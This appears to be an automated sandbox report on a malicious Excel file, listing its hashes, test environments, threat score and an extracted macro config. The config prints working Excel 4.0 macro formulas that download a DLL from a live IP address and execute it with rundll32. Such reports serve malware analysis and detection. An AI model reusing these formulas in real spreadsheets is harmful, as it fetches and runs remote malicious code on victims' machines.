General
-
Target
021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118
-
Size
101KB
-
Sample
240427-bmrwjagg5z
-
MD5
021412d6c7f5d8357ca18623ab41d2c4
-
SHA1
59807e7fa0de3d3d39db6c154ee3a94c63ffea5f
-
SHA256
e1fbc397fd27ff212644a632aef8a3ca1debbd7c0327b461fa9e964351a7f421
-
SHA512
84515748131e55e8bb8442d5fa728f2db3961ac0d8eb23055dbe8ea5b94f56a23ac35a34dd939e134c39161d356956d4d883e0bc6aa9741693f868604db38398
-
SSDEEP
3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN71:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmI
Behavioral task
behavioral1
Sample
021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118.xls
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118.xls
Resource
win10v2004-20240419-en
Malware Config
Extracted
http://209.141.54.161/crypt.dll
-
formulas
=CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://209.141.54.161/crypt.dll","C:\rncwner\CkkYKlI\UiQhTXx.dll",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer",0,0) =HALT()
Extracted
http://209.141.54.161/crypt.dll
Targets
-
-
Target
021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118
-
Size
101KB
-
MD5
021412d6c7f5d8357ca18623ab41d2c4
-
SHA1
59807e7fa0de3d3d39db6c154ee3a94c63ffea5f
-
SHA256
e1fbc397fd27ff212644a632aef8a3ca1debbd7c0327b461fa9e964351a7f421
-
SHA512
84515748131e55e8bb8442d5fa728f2db3961ac0d8eb23055dbe8ea5b94f56a23ac35a34dd939e134c39161d356956d4d883e0bc6aa9741693f868604db38398
-
SSDEEP
3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN71:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmI
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-